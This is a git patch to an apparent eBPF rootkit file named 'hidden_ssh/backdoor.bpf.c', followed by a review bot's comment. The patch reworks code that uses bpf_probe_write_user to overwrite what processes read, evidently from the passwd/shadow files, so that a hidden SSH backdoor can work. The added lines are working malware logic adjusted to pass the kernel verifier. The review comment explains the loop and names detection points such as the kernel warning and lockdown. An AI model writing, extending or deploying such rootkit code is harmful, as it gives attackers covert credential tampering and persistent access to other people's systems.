From 40717eb393c879fb86a03403bdac1a16a72eadeb Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Rom=C3=A9o=20Phang?=
Date: Tue, 3 Sep 2024 16:37:18 +0200
Subject: [PATCH] fix: dynamic length eBPF writing
---
 lib/libbpf | 2 +-
 src/hidden_ssh/backdoor.bpf.c | 14 +++++++++++---
 2 files changed, 12 insertions(+), 4 deletions(-)
diff --git a/lib/libbpf b/lib/libbpf
index f81eef2..caa17bd 160000
--- a/lib/libbpf
+++ b/lib/libbpf
@@ -1 +1 @@
-Subproject commit f81eef23b33c0dbf923e863a72ce51ea4d32e291
+Subproject commit caa17bdcbfc58e68eaf4d017c058e6577606bf56
diff --git a/src/hidden_ssh/backdoor.bpf.c b/src/hidden_ssh/backdoor.bpf.c
index 6557d6b..08dea0a 100644
--- a/src/hidden_ssh/backdoor.bpf.c
+++ b/src/hidden_ssh/backdoor.bpf.c
@@ -408,10 +408,18 @@ int read_exitpoint(struct trace_event_raw_sys_exit *ctx)
 {
 return 0; // You should not be here
 }
- if (ctx->ret > 0 && ctx->ret <= sizeof(file->buff))
+ int overwrite_len = 0; // need to reach to ctx->ret
+ for (int i = 0; i < 6500; i += 1) // arbitrary value
 {
- // bpf_printk("OVERWRITTEN PASSWD/SHADOW");
- bpf_probe_write_user((void *)e->buff, (void *)file->buff, ctx->ret);
+ if (i + 1 > ctx->ret)
+ {
+ overwrite_len = i;
+ break;
+ }
+ }
+ if (overwrite_len > 0 && overwrite_len <= sizeof(file->buff) && overwrite_len <= ctx->ret)
+ {
+ bpf_probe_write_user((void *)e->buff, (void *)file->buff, overwrite_len);
 }
 }
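Review bot: The bounded loop added in read_exitpoint and its `6500` limit are undocumented, and nothing visible ties that constant to `sizeof(file->buff)`, so a reader cannot tell that the loop only copies `ctx->ret` into `overwrite_len` when it is below 6500 and otherwise leaves it at 0, in which case no write happens. A comment above the loop such as `/* overwrite_len = ctx->ret when 0 < ret < 6500, else 0 (no write); presumably a bounded form of the length for the verifier */` would state that. For anyone analysing this file, the security-relevant line is the `bpf_probe_write_user()` call, which apparently replaces the bytes a process received from read() with `file->buff`, so what the process sees no longer matches the file on disk. The kernel logs a warning naming the loading process when a program using that helper is installed, and kernel lockdown refuses the helper, so both are practical detection and prevention points. The body of read_exitpoint starts and ends outside the hunk.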